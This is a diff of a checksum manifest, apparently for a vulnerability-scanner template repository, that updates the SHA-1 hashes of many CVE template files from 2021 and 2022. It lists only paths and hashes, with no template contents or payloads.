+http/cves/2021/CVE-2021-45428.yaml:d9543e034aa26febc3ae35f0bbe1e5435007e03e http/cves/2021/CVE-2021-45967.yaml:e8edbbaae094d2fe009f70b693b972ad5dc3ce63 -http/cves/2021/CVE-2021-45968.yaml:e93c163e413c8cb48006f395b4155a9e138a2730 -http/cves/2021/CVE-2021-46005.yaml:975f64d55c89f55bd807e7dcffd9352f300238b7 -http/cves/2021/CVE-2021-46068.yaml:5defedf513cf5bc9ff3aaa6fdf94c19801c356dc -http/cves/2021/CVE-2021-46069.yaml:c5725a96b235ee3493409620cf12203161b176ac -http/cves/2021/CVE-2021-46071.yaml:2d2b3f02524f3cf4a9143abc1dcc0862c3ecc22a -http/cves/2021/CVE-2021-46072.yaml:4639550b53d73d47f1838ccd016adc21ce7de767 -http/cves/2021/CVE-2021-46073.yaml:7bcdba2a792025b9470fef9418514f7c9758e36d -http/cves/2021/CVE-2021-46107.yaml:5543f386476df149ff7e2d24e197ad7f6ea1aeb2 -http/cves/2021/CVE-2021-46379.yaml:e1f324b8e6d420414548872cf7ebf11fc721a0d7 -http/cves/2021/CVE-2021-46381.yaml:1481dd98f53e3ab6537073872eb1b67e58e2f3d4 -http/cves/2021/CVE-2021-46387.yaml:19781fb65d314c585a80f86ab3be193285849694 -http/cves/2021/CVE-2021-46417.yaml:16ea0410faa75c14f7e59257d2a7ed9d4caec3ec +http/cves/2021/CVE-2021-45968.yaml:c662041ce37f1ef0e7f35811f08718316b210ee8 +http/cves/2021/CVE-2021-46005.yaml:e790d4ef858e8058da7449ab79ab41d74b37a66c +http/cves/2021/CVE-2021-46068.yaml:437f7b97529c0af527ea15f1fd875c6113d5b344 +http/cves/2021/CVE-2021-46069.yaml:027333b2b4bc636f4855a64da7b89655f4d3a88c +http/cves/2021/CVE-2021-46071.yaml:38240b281fd44a6beccd1f4a287f2e68bd494240 +http/cves/2021/CVE-2021-46072.yaml:cd36f0accc7900f6cc766080c2b51fda7c1edc40 +http/cves/2021/CVE-2021-46073.yaml:7b44c2cc7ff23e0d955c88ec5c7a049f1ff11683 +http/cves/2021/CVE-2021-46107.yaml:f614888bb5e3bf66d39d77014bef40acc0cc9bf4 +http/cves/2021/CVE-2021-46379.yaml:4bbeddced38ecf49455506930c3a2db54e0fd27f +http/cves/2021/CVE-2021-46381.yaml:390434da40529edd065fdc774d4d3e97ab59d932 +http/cves/2021/CVE-2021-46387.yaml:e8672fb84c194f177f934e91cb323f9b24a5e8e3 +http/cves/2021/CVE-2021-46417.yaml:bdad5adce49878f1691a7a766820045d68aefebf http/cves/2021/CVE-2021-46422.yaml:6f235b37d328552d8e9d32e4725d377bbc19c850 -http/cves/2021/CVE-2021-46424.yaml:0f03cc0634103219642134e4c6dfabc3f5ba898d -http/cves/2021/CVE-2021-46704.yaml:e3f909d1abc5c4c6f492f4726fc2511c25b8879f -http/cves/2022/CVE-2022-0140.yaml:cdee8a2fe57f4ec900f2e023a2a99d3533d26bf4 -http/cves/2022/CVE-2022-0147.yaml:1a0e1151e73554777c3219ff87d21a41fac15cea -http/cves/2022/CVE-2022-0148.yaml:d822e419faf9eabbcf11e035d35e15bce06252ad -http/cves/2022/CVE-2022-0149.yaml:7b1bebb173f1ab3f2e2583dbd40adaa7fa92ef57 -http/cves/2022/CVE-2022-0150.yaml:c63d6f1823ba162e22c42baeddf1faf0048fc8b4 -http/cves/2022/CVE-2022-0165.yaml:1cf8e5c47e17b3671854c1a763f07097e7d3b6b5 -http/cves/2022/CVE-2022-0169.yaml:81596b6a3447589ed04760add7f9826a5c943cf9 -http/cves/2022/CVE-2022-0189.yaml:02c06aa58498712500e3d71803cc25a229345f72 -http/cves/2022/CVE-2022-0201.yaml:a2fb8ab4e6fbebc74a7fe8865803762ca1bc87e5 -http/cves/2022/CVE-2022-0206.yaml:0cbaece0c7171228cc8dbe6a3ff70cee3806dafd -http/cves/2022/CVE-2022-0208.yaml:41da53cf5d3d2eae2d69ac0bc33786eef4802840 -http/cves/2022/CVE-2022-0212.yaml:ef2b0b4f89d12165944f0d296b662621f198a229 -http/cves/2022/CVE-2022-0218.yaml:608c7c5c3561b1ab2a864d764f43490527e070ec -http/cves/2022/CVE-2022-0220.yaml:2511118e6bac0ed412623c19a126f9a1a52d78ed -http/cves/2022/CVE-2022-0228.yaml:0a9a78608bc667b09c6e3c23f26ef53559ec2116 -http/cves/2022/CVE-2022-0234.yaml:520c5482e7363ab253e5319571df1ece5121fcc4 -http/cves/2022/CVE-2022-0271.yaml:e2c472d903fca808b2ca3cbc9ef378d100ed90b0 -http/cves/2022/CVE-2022-0281.yaml:84f7227dfe642cb02b96a6c90e0f47c443634f3d -http/cves/2022/CVE-2022-0288.yaml:5fc92015a7ca7c9094961ce3c276eef20f788c77 +http/cves/2021/CVE-2021-46424.yaml:87e70fd9157c7c619ac603c9b31701b284657407 +http/cves/2021/CVE-2021-46704.yaml:94a97daf11790bc2c2eade103912de2eb5132c58 +http/cves/2022/CVE-2022-0140.yaml:042a1051f00b0e5405d52859c9c889163a466473 +http/cves/2022/CVE-2022-0147.yaml:09d546ea9b4ddee33eb2a0f03fc0693828762cec +http/cves/2022/CVE-2022-0148.yaml:ba8aeabc27ce239a4b2dfbb8069a82db7a4bd6ab +http/cves/2022/CVE-2022-0149.yaml:2f8f8ae8312073640f8c5ea22d89d3ca330a73f4 +http/cves/2022/CVE-2022-0150.yaml:d7ad28bed1ae706171a88a825639efaab5f3d332 +http/cves/2022/CVE-2022-0165.yaml:851e8808e19bf85e7b863cedd41993790abbec46 +http/cves/2022/CVE-2022-0169.yaml:0df5149cd9da9ddfdd5b1f9abe34f5cf06e24777 +http/cves/2022/CVE-2022-0189.yaml:ef4f3a423f4864f431f0abc85b413e8d67a74138 +http/cves/2022/CVE-2022-0201.yaml:18c7531500ff6b80950dc24dfb2c209b27e9b1d4 +http/cves/2022/CVE-2022-0206.yaml:1fcd2e98659c06adc0ef9384d955935e4b582bec +http/cves/2022/CVE-2022-0208.yaml:4429b1a57a0082a0f6b69f84cb1c9f5eae4e4b57 +http/cves/2022/CVE-2022-0212.yaml:7908a7cceb9977eef6db5e8e909cd9afa7cd50b3 +http/cves/2022/CVE-2022-0218.yaml:a4ef4fab88a4e6a96e61a6e068d1c6359f61b997 +http/cves/2022/CVE-2022-0220.yaml:87ad9134fe8c9c87bff09389a5fa61306ab62076 +http/cves/2022/CVE-2022-0228.yaml:4b7589afb4f4e8c7cf954ea1c1ffe58108a32785 +http/cves/2022/CVE-2022-0234.yaml:67243f8c2d228a13583c8c635e140f9717621d63 +http/cves/2022/CVE-2022-0271.yaml:173566d55764b709c5fe895b65bce364cd1e3e02 +http/cves/2022/CVE-2022-0281.yaml:830f4e0278b4ed4b3896389b6327f5c5ae41b9fb +http/cves/2022/CVE-2022-0288.yaml:475da73015b2ebf7964d4b72883a47d82c619e5b http/cves/2022/CVE-2022-0342.yaml:234da80c3f1476533dc4e8ab97a167cd01e0bded -http/cves/2022/CVE-2022-0346.yaml:b9ba810117a613e23020b7ce05245c0666cccba6 -http/cves/2022/CVE-2022-0349.yaml:f42a9f2243964847457f76ca3ca9c0739b4dd0a0 -http/cves/2022/CVE-2022-0378.yaml:11a253d3e11e58164a2fcbce0d757ac9f27fe6b7 -http/cves/2022/CVE-2022-0381.yaml:db91d4c2e7c7e3dea4a36a9756b1a2bf21a1aa73 -http/cves/2022/CVE-2022-0412.yaml:d548498267064c906c4528f315362809b060b550 -http/cves/2022/CVE-2022-0415.yaml:e5f364f5ba935c8c9655f940cb4dcf0c1cc32e5e -http/cves/2022/CVE-2022-0422.yaml:68ca5fc74887a2a159bf30f2240dc9ae10782f91 -http/cves/2022/CVE-2022-0432.yaml:bb94451d9ad0cd95121593430b68e5fa580eb844 -http/cves/2022/CVE-2022-0434.yaml:7d2fbe0912ec3776dc0ab3ff9d085d3b74712d62 -http/cves/2022/CVE-2022-0437.yaml:96000882119a091bd518be3dc8d3e05f1c02f27a +http/cves/2022/CVE-2022-0346.yaml:7f6a3c1f9265ec7ddcd2d3e8c98af9a2e96ae2a5 +http/cves/2022/CVE-2022-0349.yaml:c5f98f6bf37e1ce4998c63c2017e3936d00d9168 +http/cves/2022/CVE-2022-0378.yaml:644302111bee2bdff438e9f20a66acf7678f0292 +http/cves/2022/CVE-2022-0381.yaml:473c8bf696fd577ef044d619da7fcd1207456ce8 +http/cves/2022/CVE-2022-0412.yaml:8f51f2c63b8d4343232b33a567b9ef6f08215114 +http/cves/2022/CVE-2022-0415.yaml:c3d6edc8198ea8698b0ec8f90a59a8ecb22bd5b7 +http/cves/2022/CVE-2022-0422.yaml:b78c7e193ab0a7ddfd8b75d2b93b799ebbd8203b +http/cves/2022/CVE-2022-0432.yaml:34d7845f6cc4909e95c1815d91f9aa8027128b75 +http/cves/2022/CVE-2022-0434.yaml:4d65d6f4ac3a4712113757e5dc9bc15ea687491a +http/cves/2022/CVE-2022-0437.yaml:ecbde7f1dc6001d94bd9fbc1a871388a47739c43 http/cves/2022/CVE-2022-0441.yaml:9393de0ff8186ee8ea576f8ff3cbc2656db82786 -http/cves/2022/CVE-2022-0482.yaml:235e33d87786c77d9f8bd28381981b08f7159a5a -http/cves/2022/CVE-2022-0533.yaml:4586a3e8ca7c936c5f1e3385b7ec510441582b8e -http/cves/2022/CVE-2022-0535.yaml:cb07bc93e27b9eb45e0b979aa4710c7edd8bbe17 -http/cves/2022/CVE-2022-0540.yaml:50db176048a7bfe49b3696365002f35a3371d571 -http/cves/2022/CVE-2022-0591.yaml:6d20084936f2292383e7c4b82724d51dd9dfe339 -http/cves/2022/CVE-2022-0594.yaml:00e532729b6522a7c41d4d7ca4aa1d490f0ec94e -http/cves/2022/CVE-2022-0595.yaml:94e87a963c2e534fa14fd4f69c263212a82c8ad7 -http/cves/2022/CVE-2022-0597.yaml:85c79c7d39755ff9df9d8f562f651b80c81e35fd -http/cves/2022/CVE-2022-0599.yaml:a6c8c3927d24d17c6bac01e3ef97c28fe704dedf -http/cves/2022/CVE-2022-0651.yaml:9388184eb5d71764f0b74711cda5258864004836 +http/cves/2022/CVE-2022-0482.yaml:b0267640b206f99884d658f3d39502a65b8f14d8 +http/cves/2022/CVE-2022-0533.yaml:3cecd4b924ab8d957820aed2a91ddd721e7e8585 +http/cves/2022/CVE-2022-0535.yaml:02300ba9bb6566452ac1ef9338c86482b10ffd3d +http/cves/2022/CVE-2022-0540.yaml:dca678bf434b457b087bad2c5def2f8f456d2dc0 +http/cves/2022/CVE-2022-0591.yaml:7dabb0ce018a4db1cda68d88186a96937fb0ce19 +http/cves/2022/CVE-2022-0594.yaml:685097eddb8087b316d7b9b9a7df7481b69f5e01 +http/cves/2022/CVE-2022-0595.yaml:693a169bae8445a4fee421ce4c1351ef35d336df +http/cves/2022/CVE-2022-0597.yaml:7baa635759d1ce3dd83b04aabe63c2b61db57f64 +http/cves/2022/CVE-2022-0599.yaml:9d3f3483855cf08262c8c90b10986f5c9be34b06 +http/cves/2022/CVE-2022-0651.yaml:ac561ce0cd70ee3ba28dbd4574c0aa4f71e6fb54 http/cves/2022/CVE-2022-0653.yaml:0b657b0aef66e081aa1401a1a32ec65fbbf23d90 -http/cves/2022/CVE-2022-0656.yaml:f6293a6b6146bbbaed3aad702e151854b757ec09 -http/cves/2022/CVE-2022-0658.yaml:42927645cebcafdb539613d4906b7886dd65188e -http/cves/2022/CVE-2022-0660.yaml:760b5eb5c522e49cf2b7f88fdf9a9bd3baae0bed -http/cves/2022/CVE-2022-0678.yaml:342e5c8b8ccfbea2d174db697339ecb48583fac1 +http/cves/2022/CVE-2022-0656.yaml:8e7e4f70c52adb5087aba05625318b79c4ea0c86 +http/cves/2022/CVE-2022-0658.yaml:3b073a95e87ba20d52633a868711a2ad3e572fd8 +http/cves/2022/CVE-2022-0660.yaml:bc8624c9f9778cc1927755802af545ad25f77a07 +http/cves/2022/CVE-2022-0678.yaml:daa5c6a8e7ccd74537d6ee0afc193779118412b4 http/cves/2022/CVE-2022-0679.yaml:5d89b909104e166f656394d8f94154884f1387df -http/cves/2022/CVE-2022-0692.yaml:b2bdaa3babefba4a27daddea3d3136d7593a3a19 -http/cves/2022/CVE-2022-0693.yaml:1cb4d9c8b713751805345da6b0fc850674123347 +http/cves/2022/CVE-2022-0692.yaml:bcbf1a784bc8a727a26621c2f6b5dea77e0f5b64 +http/cves/2022/CVE-2022-0693.yaml:024b75b683a8a7f7fadfddb8e447746ec8b3ed64 http/cves/2022/CVE-2022-0735.yaml:71ac4889c70c4aa0afafb26a384d603112870413 -http/cves/2022/CVE-2022-0747.yaml:39f57b570572d9c4e5724d389973e3b969c13d1a -http/cves/2022/CVE-2022-0760.yaml:dcc75b2450ed199cafea6d041f7936d53212475a -http/cves/2022/CVE-2022-0769.yaml:cd1abf5dde7427abb01eb0614f4ffced9195cf9a -http/cves/2022/CVE-2022-0773.yaml:8225b2f63e6d99f81e5d5a8f604ffcea2db13c6e -http/cves/2022/CVE-2022-0776.yaml:f3c7eec3baf8ee4a0ee4fec432aa1aa49c00129c -http/cves/2022/CVE-2022-0781.yaml:6968fbf37d4beda4501091b26f8ad0515f17b17e -http/cves/2022/CVE-2022-0784.yaml:eca56e8e061a4896606a53966a694863139552d1 -http/cves/2022/CVE-2022-0785.yaml:4853707bfc44a5fd1acbe57ed3b4f1f0a533a0eb -http/cves/2022/CVE-2022-0786.yaml:e881e51ac4e21d38fe6b080db4902f0262f2102e +http/cves/2022/CVE-2022-0747.yaml:73539047bab07217d090da399e0b41ab9a271ae6 +http/cves/2022/CVE-2022-0760.yaml:9901c62e84bc7a8f65f9787bd4be3d732be2a518 +http/cves/2022/CVE-2022-0769.yaml:2b8e57f7eec0828f2f70d03ee2c2dbb93bb28a88 +http/cves/2022/CVE-2022-0773.yaml:053c1d7eb8c30a17c2c6b41f9f7677f819275645 +http/cves/2022/CVE-2022-0776.yaml:7e82572adf28817789773cd76978850cbf6bbc70 +http/cves/2022/CVE-2022-0781.yaml:dff406c2781448970804a750f4ee7f92007c7248 +http/cves/2022/CVE-2022-0784.yaml:749a788ac94547f07ceae6aaaaf01a724ea09bec +http/cves/2022/CVE-2022-0785.yaml:4c8168258179aa55a653360c800af2dfd0d7a005 +http/cves/2022/CVE-2022-0786.yaml:a027a29f0dbc7732537f9a8cc3a941955fa138a9 http/cves/2022/CVE-2022-0787.yaml:381b553b7e97c8dcd0b10fea1bd4f3e6325b98b0 -http/cves/2022/CVE-2022-0788.yaml:1bc33872822ac0ee5009b3d528b96e0edb8ae277 -http/cves/2022/CVE-2022-0814.yaml:66b6a235666d8aa29d7bfaedaca4ab92aaff17a7 -http/cves/2022/CVE-2022-0817.yaml:8d7278df516c097bb9a9c8c9380a04e40bb11229 +http/cves/2022/CVE-2022-0788.yaml:86f1ef3eec0540e8638785f3f5391f33e74023e7 +http/cves/2022/CVE-2022-0814.yaml:5f7a3364f5329b31e62dccf2799a8432d4a42009 +http/cves/2022/CVE-2022-0817.yaml:34c7dd1082560a8e9144fb948904043e0926f5d8 http/cves/2022/CVE-2022-0824.yaml:7e1bf6a3a6b617f267b4a23b0ddc5a63a3b58b11 -http/cves/2022/CVE-2022-0826.yaml:33df4c57c3a3e1b576a31bd7fd4dc630ffba902c -http/cves/2022/CVE-2022-0827.yaml:a4cc91c7a83cf1be584daa9c95b29ea9db1bee6e -http/cves/2022/CVE-2022-0846.yaml:33ac4c0d39fc04d03d39724e593a309d17a42f53 -http/cves/2022/CVE-2022-0864.yaml:f5d6b67c89ccff9f1ec51a26078cd6c6fe82b6a1 -http/cves/2022/CVE-2022-0867.yaml:1143cea4416fa37b4353a36d9cb7839cd6432ddc -http/cves/2022/CVE-2022-0869.yaml:fd9c67adf12bed48ec1e1dadb1d2b40c65333556 -http/cves/2022/CVE-2022-0870.yaml:72247628582c7728559213272a1c5d44174e6aed -http/cves/2022/CVE-2022-0885.yaml:9f3a1149bed1a473796e27295970a23235cc4098 -http/cves/2022/CVE-2022-0899.yaml:ab381eea40b05c433fc0718282d82170f4b2cc7c -http/cves/2022/CVE-2022-0928.yaml:a02392a1f4e2a52e5a385a80e994ffb0de5e4a02 -http/cves/2022/CVE-2022-0948.yaml:d4dcbbfa7ba6c36fd14c0bf8550d9282d75be3c3 -http/cves/2022/CVE-2022-0949.yaml:91ec2ae293752e8522a7d420f29e6f58c64e5af8 -http/cves/2022/CVE-2022-0952.yaml:ca628befdc47141ab12224cf2af7fa323cfeb000 -http/cves/2022/CVE-2022-0954.yaml:2eaf1b827111868c5559c43282f3376178174a07 -http/cves/2022/CVE-2022-0963.yaml:3218264eca864cc95302c40b5b3ee60f83c33d98 -http/cves/2022/CVE-2022-0968.yaml:72a646681ce3011d170134910e75ff1e20241734 -http/cves/2022/CVE-2022-1007.yaml:3247b76763c3e18fdf08ce25933a17a6d8443ce2 -http/cves/2022/CVE-2022-1013.yaml:509b7baf2afbe3cfb8140e84ec3e44c9cb0de05e -http/cves/2022/CVE-2022-1020.yaml:93f929f36221446188ee8ea8d3569431d7a114b4 +http/cves/2022/CVE-2022-0826.yaml:4094bc624a17321243e3f9acfdbdb6cdda821db1 +http/cves/2022/CVE-2022-0827.yaml:11fa885ffa45a9e9684b5b73f01036dfc36bb74f +http/cves/2022/CVE-2022-0846.yaml:4fbd53b169fd6b9efaf5e5341824143a5c9eeab0 +http/cves/2022/CVE-2022-0864.yaml:4946e96be9692df8cb8a2437c4a6348dfee10057 +http/cves/2022/CVE-2022-0867.yaml:8ab5bfefe7d4e5aaf65c22c74f993e1d052831c0 +http/cves/2022/CVE-2022-0869.yaml:0a0bd195a0c29cdb51aa435abe6f8b6b360c1b0b +http/cves/2022/CVE-2022-0870.yaml:7c8421dd856c07e4821a7a3d5dc2b3da02098fb2 +http/cves/2022/CVE-2022-0885.yaml:9e9b2e4f55855f9bb104264ac00bdd7303a397a2 +http/cves/2022/CVE-2022-0899.yaml:b53c358e5d9274db91a95372a7b138ccf4570768 +http/cves/2022/CVE-2022-0928.yaml:c56c1a5fb8d8a4fa8be4406432587fd8c4cbc8d8 +http/cves/2022/CVE-2022-0948.yaml:a85cb10278fc526fc8bde10d7c01acd8a4ff0397 +http/cves/2022/CVE-2022-0949.yaml:a87dac5eda95703269519c6e76472294184aecfc +http/cves/2022/CVE-2022-0952.yaml:e37b4da8c46c811a68ffb73bfed3a4d4208eaa1d +http/cves/2022/CVE-2022-0954.yaml:a2d82631ce37d527d467ad9fabd3fee6eebf351f +http/cves/2022/CVE-2022-0963.yaml:d1954c8626f3c9b32d16ad57689cc8a394dbfea1 +http/cves/2022/CVE-2022-0968.yaml:fa68c019232f3e351e0a587864d6bc0392c9b32e +http/cves/2022/CVE-2022-1007.yaml:bd90e8646fa0b282b8f7d8a273d3f401c10f47d4 +http/cves/2022/CVE-2022-1013.yaml:0e83aad1a0fbb2095ce239e4b4e0b9c05a1a8122 +http/cves/2022/CVE-2022-1020.yaml:db46db163a15541f89beaece57bf128ef1a01762 http/cves/2022/CVE-2022-1040.yaml:b057e33f362402b7c4c1eaf6e7b47a2fc3a14840 http/cves/2022/CVE-2022-1054.yaml:ddc3f1808d79be731ec9a60fe94571ea581a25ca -http/cves/2022/CVE-2022-1057.yaml:ce6500ede7486c9c14dd043ccd3a18bb6aeac103 -http/cves/2022/CVE-2022-1058.yaml:f9164611d982d919bc999d585519449a8550953e +http/cves/2022/CVE-2022-1057.yaml:f15f0444dd46753a13ae2b14c68eecc7f6f3b13e +http/cves/2022/CVE-2022-1058.yaml:3cbb845b521184c45d0921ba6b4790d169cbb703 http/cves/2022/CVE-2022-1119.yaml:7bb8afef7b2f1dd739e89fd19965d844dcb7f728 http/cves/2022/CVE-2022-1162.yaml:00774706d5d3a3eb4e2f0b5af969e90947bcb238 -http/cves/2022/CVE-2022-1168.yaml:b0ad1d5230b46634318a6f617770e75427a2ce24 -http/cves/2022/CVE-2022-1221.yaml:8707124dba401907ad6dad6a05c39010e2cddb0c -http/cves/2022/CVE-2022-1329.yaml:e95eb0136f42a32365f09afcbe05016fff715f7f +http/cves/2022/CVE-2022-1168.yaml:fd24f1ce9cc2439269fff107c445f15489c48127 +http/cves/2022/CVE-2022-1221.yaml:5f19b68ec580771713a1056098173077ffe0873b +http/cves/2022/CVE-2022-1329.yaml:84f5bd5ed1900864fe8099a485ec186d84abf26a http/cves/2022/CVE-2022-1386.yaml:bc29833d0667f925e0cc6e347176a97d209d6745 http/cves/2022/CVE-2022-1388.yaml:d4f87a003adb83543e6468b8672af7c3c7804618 http/cves/2022/CVE-2022-1390.yaml:7898715e438fee1a4b5c86559b2ad47221256b64 -http/cves/2022/CVE-2022-1391.yaml:3e7eabecf022116b2a851c2415ce9fb3002607a1 -http/cves/2022/CVE-2022-1392.yaml:3fbf164d7ae070c0e8a6ccbe53c9609e4a0da624 -http/cves/2022/CVE-2022-1398.yaml:599b10a29047c751bd185ad7b1022bdf6bc6f0f4 -http/cves/2022/CVE-2022-1439.yaml:69c22e104b04e6d4b31c3894d4e6cd6db4d51705 -http/cves/2022/CVE-2022-1442.yaml:8610e413403e933b7c02c2ac83b4c51975357be3 -http/cves/2022/CVE-2022-1574.yaml:8390a062a9add1fb2445c225ffc1d5c173860912 -http/cves/2022/CVE-2022-1595.yaml:12ecc47099bc904586f6494a0f52063aff7b1c9b -http/cves/2022/CVE-2022-1597.yaml:f947f0e0e4192401d9e8677c6ba75c009d886f87 -http/cves/2022/CVE-2022-1598.yaml:fcb35643c475a27bceb04ce17d6bccfa9897639d +http/cves/2022/CVE-2022-1391.yaml:83460418455cd1e806350e4cc9036f650475db39 +http/cves/2022/CVE-2022-1392.yaml:8edc6c099a813422d1ec1a25aae9a04b6f8216ec +http/cves/2022/CVE-2022-1398.yaml:c925a19f8ff4d07428b0d52b13a75df5140a12b5 +http/cves/2022/CVE-2022-1439.yaml:c61fa0921aacf096f98a6b4017e1ba4467e4451d +http/cves/2022/CVE-2022-1442.yaml:2836b6c081c62be4c0da87dbf1a2dca4e7a93d0f +http/cves/2022/CVE-2022-1574.yaml:148dc283f1f3125b4afafa7f83b2de52ec36b6db +http/cves/2022/CVE-2022-1595.yaml:64c871534e64a9461227d010f5df22bfa56b4f5c +http/cves/2022/CVE-2022-1597.yaml:4587cbe9c70f9716249117d073d76e17be0ba84b +http/cves/2022/CVE-2022-1598.yaml:cd374e2213630c97666e7a5d7b1054e841dc104f http/cves/2022/CVE-2022-1609.yaml:dc87f85d148b12b7a53cce475c80a1800806c01a -http/cves/2022/CVE-2022-1713.yaml:e616548c3a5c06b8b8a251c471bd92869e7e2ff6 -http/cves/2022/CVE-2022-1724.yaml:05e20f102a9041e9005d43f74737d8cfdd056131 -http/cves/2022/CVE-2022-1756.yaml:2f359587e65bb8f17cb68e8e5fcee46c58508cc2 -http/cves/2022/CVE-2022-1768.yaml:10b91fd2f6d68ba0c5957860ffc73cce1c89782a -http/cves/2022/CVE-2022-1815.yaml:54efe1225ed39c7c3fdb51c3aebf639ffbb00121 -http/cves/2022/CVE-2022-1883.yaml:ca109998fdb0d768138666f681c26dce5de4438a -http/cves/2022/CVE-2022-1903.yaml:c9e2d1c291d6410825439264b57c000d5e2247d9 -http/cves/2022/CVE-2022-1904.yaml:cb8aa006603b050e626abe5bea190134d5935067 -http/cves/2022/CVE-2022-1906.yaml:75803d8111f9774464dce929fa82ac68131e11da -http/cves/2022/CVE-2022-1910.yaml:da7ce112a8dfdd54f9e84b430389b3e5f683c144 -http/cves/2022/CVE-2022-1916.yaml:49a0404465a5537d966449a44b1be4578d026642 -http/cves/2022/CVE-2022-1933.yaml:3e13e9c126f8ab0901898a6259bff8ef85d0cd0e -http/cves/2022/CVE-2022-1937.yaml:92990281bca8f779c80924bb128dd66987433b5b -http/cves/2022/CVE-2022-1946.yaml:c7dcb916198bf607be5ab526842e7865c00f1ce4 -http/cves/2022/CVE-2022-1952.yaml:b8df4d7c76e9fed71ea996c0ae55e60224203089 -http/cves/2022/CVE-2022-2034.yaml:817731ea7e434f4fe95813e38880404b2faaa8c4 -http/cves/2022/CVE-2022-21371.yaml:6656f8e4630007dbd6e9d4aea1cba472d0fea1b4 -http/cves/2022/CVE-2022-21500.yaml:55aee1838c03c79caec6da00558f795963a49d05 -http/cves/2022/CVE-2022-21587.yaml:e5f9ed81f54619b9d6a1ae32f44b4d81c255fdb6 -http/cves/2022/CVE-2022-21661.yaml:908e0ec6378ebb6ce62c1cc3816bcf6f28733956 -http/cves/2022/CVE-2022-21705.yaml:10f0c34b6acf99a3272323f91423badbd8a4f442 -http/cves/2022/CVE-2022-2174.yaml:3a322cafa6d86f1701b84bffb8381e3a3f3266f0 +http/cves/2022/CVE-2022-1713.yaml:4b7e9ee34573098d5dd2801a7027b2a37411bc85 +http/cves/2022/CVE-2022-1724.yaml:0b2e7aa94bd6dc90f1887c5833f51a6eb2644ec7 +http/cves/2022/CVE-2022-1756.yaml:0c059e9492e4cf49771b2b7adfea4cf70b98ff0e +http/cves/2022/CVE-2022-1768.yaml:092562898dcadd7f88ce1f0a7aa32edb1e9521d7 +http/cves/2022/CVE-2022-1815.yaml:3cea131f3bc65bfeab009607aa83f43c9e3fce0d +http/cves/2022/CVE-2022-1883.yaml:15bf388614f33a693251527651b8770fdb84fd74 +http/cves/2022/CVE-2022-1903.yaml:dd1c7bea062dbf9450cd7ebaad82eaabef92612c +http/cves/2022/CVE-2022-1904.yaml:a241f78a9784dd0695b3162d41aa5c6214d80b2e +http/cves/2022/CVE-2022-1906.yaml:73786ef16db0b3bfeb4b960d6d4211b04b369455 +http/cves/2022/CVE-2022-1910.yaml:d942f41eaa459a39d9f89f59717f4e17b772e80a +http/cves/2022/CVE-2022-1916.yaml:7411e3c54861f63e9244c2f19c74f9fab2d46f89 +http/cves/2022/CVE-2022-1933.yaml:ac220da4eb4f7a977234725c9088c43ea7cae6b8 +http/cves/2022/CVE-2022-1937.yaml:5d4502349a59486a644ed0247c3f886ac14c983b +http/cves/2022/CVE-2022-1946.yaml:4573260df6f4a0f89e0065787b2b41930dc49d99 +http/cves/2022/CVE-2022-1952.yaml:10212d5a9a85b14bb7096a2f531803f36328fe98 +http/cves/2022/CVE-2022-2034.yaml:4ce3d923f786bb59a14978a112cf4a00aed9b818 +http/cves/2022/CVE-2022-21371.yaml:6f38c29046986b8394d3eb6eeb70a5165817f17f +http/cves/2022/CVE-2022-21500.yaml:ade623d1c2c20a227e2f5106b8cd6a7e7b8d924e +http/cves/2022/CVE-2022-21587.yaml:49ec8b516ccc4df736a85ff084a0b6754e686005 +http/cves/2022/CVE-2022-21661.yaml:7ef05827ccd510942d2df0d7e1f0daabd0fad4b0 +http/cves/2022/CVE-2022-21705.yaml:82072de4132736eca5ad12ba7a868202558050df +http/cves/2022/CVE-2022-2174.yaml:eecaf65e537eaf41696d80d1956076751ba8b231 http/cves/2022/CVE-2022-2185.yaml:de5a4f113e3bc32d66ca6d72b23ada81b6f362e5 -http/cves/2022/CVE-2022-2187.yaml:2fb3780c46e566a47c3c575f16e5e8f69831b8bc -http/cves/2022/CVE-2022-2219.yaml:86be520d018e498f3856e4f4c696a64525b134e7 -http/cves/2022/CVE-2022-22242.yaml:31e73e9a242f6b643deaaa1f0bd62bf89dc7d7ff -http/cves/2022/CVE-2022-22536.yaml:6e8027a5ad10fc7567da8f82dcbb5fea0f3c6270 -http/cves/2022/CVE-2022-22733.yaml:f37525d6af11335e8453907af2d574bc3f3bafd0 -http/cves/2022/CVE-2022-22897.yaml:e79ee3b413d9dd3db3023eb8db48d7eb07b08c1b -http/cves/2022/CVE-2022-2290.yaml:99a48ed1c76017debecb0d6df37392909a15b1e0 +http/cves/2022/CVE-2022-2187.yaml:e3c05346a2e8bee1ea9b3ddc56b59dbac836acc5 +http/cves/2022/CVE-2022-2219.yaml:30b299a5aeff1990154bf93cbb98219fdf779737 +http/cves/2022/CVE-2022-22242.yaml:b59c764e9503251b9dc17da819aa8a2c3d6f03ff +http/cves/2022/CVE-2022-22536.yaml:5b52618d82d510b1bcb446fba02d8d37a0d7ba3e +http/cves/2022/CVE-2022-22733.yaml:95a5b19e3064a535e58999322200f7719938e714 +http/cves/2022/CVE-2022-22897.yaml:71355f600342189e8b445f9769ced9ab345a9ee7 +http/cves/2022/CVE-2022-2290.yaml:5ad282c005176b022336b6fc292e870d3c93645f http/cves/2022/CVE-2022-22947.yaml:a50b3b4eea0456a3894305ab8533c61cb2f01ccf http/cves/2022/CVE-2022-22954.yaml:5b78a7bcc7c4f9fd32c38cec89038f64f7709e28 -http/cves/2022/CVE-2022-22963.yaml:10ca8303ac7b1d81994785524f68789182d1ccd0 +http/cves/2022/CVE-2022-22963.yaml:29519be9288a2deef6c7a48a4701609f709907ce http/cves/2022/CVE-2022-22965.yaml:1840185dbc6cfa96d7433b8e6afd8a68a7f41674 -http/cves/2022/CVE-2022-22972.yaml:5d62cbab9fbe9f629678c74c65a6932b4d0f0e93 -http/cves/2022/CVE-2022-23102.yaml:29a7639ac080c5a22a8e3926951adedec47d80a5 +http/cves/2022/CVE-2022-22972.yaml:2892540cb5155c5f1b16a4f554fbeae5c5b3d28c +http/cves/2022/CVE-2022-23102.yaml:ffc698a2c891f4ec294082283fe0af66043ed9d6 http/cves/2022/CVE-2022-23131.yaml:77ee3301f9cdf6ece034b5ac3bb57f7aab93dbdb -http/cves/2022/CVE-2022-23134.yaml:0b5a920b985176cfe10ba3a1250deef620cb32ae -http/cves/2022/CVE-2022-2314.yaml:0d69ba0c83e7ea61a63b23ffe6eda501e734f15d -http/cves/2022/CVE-2022-23178.yaml:37932120849ca5de3a931138c149d274e6cdfa9d -http/cves/2022/CVE-2022-23347.yaml:a6c3acc3a984151ab7a388d589d1d2f02037c1b2 